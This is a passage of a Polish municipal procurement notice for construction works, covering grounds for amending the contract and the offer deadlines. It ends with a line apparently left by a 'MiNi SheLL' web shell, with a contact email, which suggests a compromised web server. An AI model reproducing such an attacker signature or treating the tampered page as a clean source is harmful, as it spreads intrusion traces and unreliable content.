   b)   wystąpienie na placu budowy niekorzystnych warunków pogodowych, uniemożliwiających realizację cyklowych
         robót budowlano-montażowych. Przez niekorzystne warunki pogodowe rozumie się: 
        -  występowanie na placu budowy temperatur powietrza poniżej -5°C mierzonej o godzinie 7:00 rano przez
           okres dłuższy niż 7 dni następujących jeden po drugim;
       -   wystąpienia w czasie dnia roboczego (7:00-16:00) wiatrów o prędkości przekraczającej 15 m/s;
           przy czym wystąpienie niekorzystnych warunków pogodowych winno być zgłoszone w dzienniku budowy oraz
             pisemnie Zamawiającemu  z potwierdzeniem przez Inspektora nadzoru a także stwierdzone zaświadczeniem
             najbliżej stacji meteorologicznej.  
2) zmiany spowodowane nieprzewidzianymi warunkami realizacji, tj. warunkami geologicznymi, archeologicznymi lub
    terenowymi, w szczególności: wykopaliska archeologiczne, niewypały i niewybuchy, niezinwentaryzowane obiekty
    budowlane;
3) zmiany będące następstwem działania organów administracji, tj. odmowa wydania przez organy administracji lub Inne
     podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę. , 

B.  Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:

1) zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy nie inne niż spełniające warunki
    określone w ogłoszeniu lub SIWZ. Zmiana tych osób nie wymaga aneksu do umowy (dla skutecznej zmiany
    niezbędna jest uzyskanie zgody Zamawiającego na zaproponowaną osobę);
2) zmiana umowy w zakresie podwykonawców, za uprzednią zgodą Zamawiającego, tj. możliwe powierzenie
    podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy, a także możliwa zmiana
    podwykonawcy na etapie realizacji robót, o ile nie sprzeciwia się to postanowieniem SIWZ,
3) siła wyższa uniemożliwiająca wykonanie przedmiotu urnowy zgodnie z SIWZ;
4) zmiana obowiązującej stawki VAT;
5) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek ewentualnych
    zmian zawartej przez Zamawiającego umowy o dofinansowanie przedsięzięcia;
6) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
7) kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami; W takim przypadku
     zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie lub usunięcie kolizji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.um.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2010 godzina 10:00, miejsce: siedziba Zamawiającego pok. 134  pietro I - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com